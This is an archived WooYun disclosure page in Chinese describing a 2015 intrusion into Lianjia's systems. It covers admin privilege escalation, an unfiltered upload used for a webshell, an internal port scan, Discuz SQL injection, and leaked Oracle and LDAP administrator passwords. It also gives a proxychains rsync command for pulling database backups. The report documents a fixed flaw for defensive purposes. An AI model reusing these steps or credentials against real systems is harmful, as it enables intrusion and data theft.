链家地产某业务漏洞导致内网渗透暴露多个安全问题

漏洞概要关注数(24) 关注此漏洞

漏洞标题：链家地产某业务漏洞导致内网渗透暴露多个安全问题

提交时间：2015-07-31 09:23

修复时间：2015-07-31 14:42

公开时间：2015-07-31 14:42

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-31：细节已通知厂商并且等待厂商处理中
2015-07-31：厂商已经确认，细节仅向厂商公开
2015-07-31：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

富还是你们富，没地方住诶
链家某业务逻辑问题可导致普通用户越权admin，任意文件上传后shell进入内网，随后发现其内网脆弱性。。。真的很脆弱，影响所有员工数据，用户数据（诸多北漂屌丝们），影响整个线上业务，猜密码大法好

详细说明：

url:http://119.254.70.121/
注册用户后居然能直接进行后台管理。。。

上传没有任何过滤，简单shell
http://119.254.70.121/https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/video/PIC_0000001180.jsp
root权限，确定一下网段

随后探测性扫描一下网段的业务

172.16.4.15:80 OPEN
172.16.4.17:80 OPEN
172.16.4.18:80 OPEN
172.16.4.20:8080 OPEN
172.16.4.14:80 OPEN
172.16.4.30:8080 OPEN
172.16.4.19:8080 OPEN
172.16.4.26:80 OPEN
172.16.4.13:80 OPEN
172.16.4.11:80 OPEN
172.16.4.16:80 OPEN
172.16.4.33:80 OPEN
172.16.4.22:80 OPEN
172.16.4.24:80 OPEN
172.16.4.23:80 OPEN
172.16.4.30:80 OPEN
172.16.4.28:80 OPEN
172.16.4.29:80 OPEN
172.16.4.25:80 OPEN
172.16.4.31:80 OPEN
172.16.4.45:8080 OPEN
172.16.4.37:8080 OPEN
172.16.4.38:80 OPEN
172.16.4.47:80 OPEN
172.16.4.40:80 OPEN
172.16.4.48:80 OPEN
172.16.4.49:80 OPEN
172.16.4.46:80 OPEN
172.16.4.50:80 OPEN
172.16.4.54:80 OPEN
172.16.4.55:8080 OPEN
172.16.4.53:8080 OPEN
172.16.4.65:8080 OPEN
172.16.4.71:80 OPEN
172.16.4.72:80 OPEN
172.16.4.77:80 OPEN
172.16.4.81:8080 OPEN
172.16.4.78:80 OPEN
172.16.4.82:80 OPEN
172.16.4.86:80 OPEN
172.16.4.85:8080 OPEN
172.16.4.84:8080 OPEN
172.16.4.86:8080 OPEN
172.16.4.92:80 OPEN
172.16.4.93:80 OPEN
172.16.4.93:8080 OPEN
172.16.4.95:80 OPEN
172.16.4.97:8080 OPEN
172.16.4.63:80 OPEN
172.16.4.101:80 OPEN
172.16.4.103:80 OPEN
172.16.4.108:80 OPEN
172.16.4.113:80 OPEN
172.16.4.115:80 OPEN
172.16.4.116:80 OPEN
172.16.4.117:80 OPEN
172.16.4.118:8080 OPEN
172.16.4.120:80 OPEN
172.16.4.121:80 OPEN
172.16.4.123:80 OPEN
172.16.4.124:80 OPEN
172.16.4.105:80 OPEN
172.16.4.127:80 OPEN
172.16.4.129:80 OPEN
172.16.4.130:80 OPEN
172.16.4.134:80 OPEN
172.16.4.136:8080 OPEN
172.16.4.138:80 OPEN
172.16.4.139:80 OPEN
172.16.4.144:80 OPEN
172.16.4.145:8080 OPEN
172.16.4.149:80 OPEN
172.16.4.147:80 OPEN
172.16.4.148:8080 OPEN
172.16.4.152:80 OPEN
172.16.4.153:8080 OPEN
172.16.4.150:80 OPEN
172.16.4.159:80 OPEN
172.16.4.159:8080 OPEN
172.16.4.154:80 OPEN
172.16.4.155:80 OPEN
172.16.4.157:8080 OPEN
172.16.4.158:80 OPEN
172.16.4.157:80 OPEN
172.16.4.160:80 OPEN
172.16.4.162:80 OPEN
172.16.4.163:80 OPEN
172.16.4.165:80 OPEN
172.16.4.165:8080 OPEN
172.16.4.172:8080 OPEN
172.16.4.173:8080 OPEN
172.16.4.174:8080 OPEN
172.16.4.176:8080 OPEN
172.16.4.175:8080 OPEN
172.16.4.177:8080 OPEN
172.16.4.179:80 OPEN
172.16.4.183:80 OPEN
172.16.4.186:8080 OPEN
172.16.4.185:8080 OPEN
172.16.4.190:80 OPEN
172.16.4.191:80 OPEN
172.16.4.195:80 OPEN
172.16.4.193:8080 OPEN
172.16.4.194:80 OPEN
172.16.4.197:80 OPEN
172.16.4.193:80 OPEN
172.16.4.199:80 OPEN
172.16.4.202:8080 OPEN
172.16.4.204:80 OPEN
172.16.4.206:80 OPEN
172.16.4.210:80 OPEN
172.16.4.212:80 OPEN
172.16.4.216:80 OPEN
172.16.4.218:80 OPEN
172.16.4.220:80 OPEN
172.16.4.221:80 OPEN
172.16.4.219:8080 OPEN
172.16.4.222:80 OPEN
172.16.4.223:80 OPEN
172.16.4.224:80 OPEN
172.16.4.225:80 OPEN
172.16.4.227:80 OPEN
172.16.4.229:80 OPEN
172.16.4.228:80 OPEN
172.16.4.230:80 OPEN
172.16.4.231:80 OPEN
172.16.4.230:8080 OPEN
172.16.4.233:80 OPEN
172.16.4.236:80 OPEN
172.16.4.235:80 OPEN
172.16.4.238:80 OPEN
172.16.4.237:8080 OPEN
172.16.4.239:80 OPEN
172.16.4.241:80 OPEN
172.16.4.242:8080 OPEN
172.16.4.243:80 OPEN
172.16.4.245:80 OPEN
172.16.4.248:80 OPEN
172.16.4.250:80 OPEN
172.16.4.251:80 OPEN

http://172.16.4.245核心销售平台弱口令，简单看一下，基本销售业务都在眼皮下了

172.16.4.236是内部论坛，discuz7.2存在sqli
获取一下表前缀：dvbb_

简单证明一下数据

拿uc_key可getshell，拿member数据可脱员工数据过sso进一步玩其他业务
来翻一翻文件，发现好东西

#Created by JInto - www.guh-software.de
#Sun Jun 15 16:00:01 CST 2008
driverClassName=oracle.jdbc.driver.OracleDriver
# \u7531\u4E8E\u4F7F\u7528p6spy\u663E\u793Aheibernate\u7684sql\u53C2\u6570\uFF0C\u56E0\u6B64\u66FF\u6362\u9A71\u52A8\uFF0C\u5B9E\u9645\u9A71\u52A8\u5728 spy.properties\u91CC\u914D\u7F6E
#driverClassName=com.p6spy.engine.spy.P6SpyDriver
url=jdbc\:oracle\:thin\:@172.16.4.129\:1521\:hstudy
#url=jdbc\:oracle\:thin\:@localhost\:1521\:orcl
p.minIdle=20
password=hstudy
p.maxActive=100
sqlldrpath=sqlldr
username=hstudy
instance=orcl
#ldap
ldap.url=ldap://172.16.3.12:389/
ldap.userDN=cn=administrator,cn=users,dc=corp,dc=homelink,dc=com,dc=cn1
ldap.pwd=azAZ123$%^1
ldap.baseDN=OU\=\u5317\u4EAC\u94FE\u5BB6,DC\=corp,DC\=linkhome,DC\=com,DC\=cn1

数据库连接串和ldap认证都拿到了
http://172.16.4.30/users/sign_in
gitlab可通过ldap认证进入
http://passport.homelink.com.cn/cas/login?service=http://sm.lianjia.com/shiro-cas
http://172.16.4.38/login_page.php?return=index.php&error=1&username=admin&perm_login=0&secure_session=1
几个敏感业务也可通过员工sso认证后访问
有办公段，但考虑到大晚上就没撸员工办公段了
接下来就是用户数据了，rsync，密码一猜就中
proxychains rsync backuser@172.16.3.112::docfileDB/rmanbackup/
password:homelink

漏洞证明：

#Created by JInto - www.guh-software.de
#Sun Jun 15 16:00:01 CST 2008
driverClassName=oracle.jdbc.driver.OracleDriver
# \u7531\u4E8E\u4F7F\u7528p6spy\u663E\u793Aheibernate\u7684sql\u53C2\u6570\uFF0C\u56E0\u6B64\u66FF\u6362\u9A71\u52A8\uFF0C\u5B9E\u9645\u9A71\u52A8\u5728 spy.properties\u91CC\u914D\u7F6E
#driverClassName=com.p6spy.engine.spy.P6SpyDriver
url=jdbc\:oracle\:thin\:@172.16.4.129\:1521\:hstudy
#url=jdbc\:oracle\:thin\:@localhost\:1521\:orcl
p.minIdle=20
password=hstudy
p.maxActive=100
sqlldrpath=sqlldr
username=hstudy
instance=orcl
#ldap
ldap.url=ldap://172.16.3.12:389/
ldap.userDN=cn=administrator,cn=users,dc=corp,dc=homelink,dc=com,dc=cn1
ldap.pwd=azAZ123$%^1
ldap.baseDN=OU\=\u5317\u4EAC\u94FE\u5BB6,DC\=corp,DC\=linkhome,DC\=com,DC\=cn1

修复方案：

自查弱口令
尽快修改ldap等关键密码，以防gitlab代码被下后门
内网业务及时补丁
最后，最重要的一条修复建议：请减免房租造福屌丝

版权声明：转载请注明来源 redrain有节操@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-07-31 14:42

厂商回复：

谢谢，业务已经下线整改。

漏洞评价：

2015-07-31 13:04 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

鸿宇牛！
2015-07-31 15:44 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

洞主你好，扫不同ip的80和8080端口使用什么？nmap吗？
2015-07-31 19:01 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了！>_<'/&\)

@默之 nmap有点慢，自己写一个py流量代理进去扫
2015-07-31 20:03 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

@redrain有节操好，谢谢了
2015-07-31 22:03 | 小红猪 ( 普通白帽子 | Rank:194 漏洞数:30 | Wow~~~哈哈~~~)

牛笔
2015-08-04 18:05 | aNsSe ( 路人 | Rank:0 漏洞数:2 | 独自一人走天下)

已学习

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130575

漏洞标题：链家地产某业务漏洞导致内网渗透暴露多个安全问题

相关厂商：homelink.com.cn

漏洞作者： redrain有节操

提交时间：2015-07-31 09:23

修复时间：2015-07-31 14:42

公开时间：2015-07-31 14:42

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 redrain有节操@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130575

漏洞标题：链家地产某业务漏洞导致内网渗透暴露多个安全问题

相关厂商：homelink.com.cn

漏洞作者： redrain有节操

提交时间：2015-07-31 09:23

修复时间：2015-07-31 14:42

公开时间：2015-07-31 14:42

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130575"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 redrain有节操@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：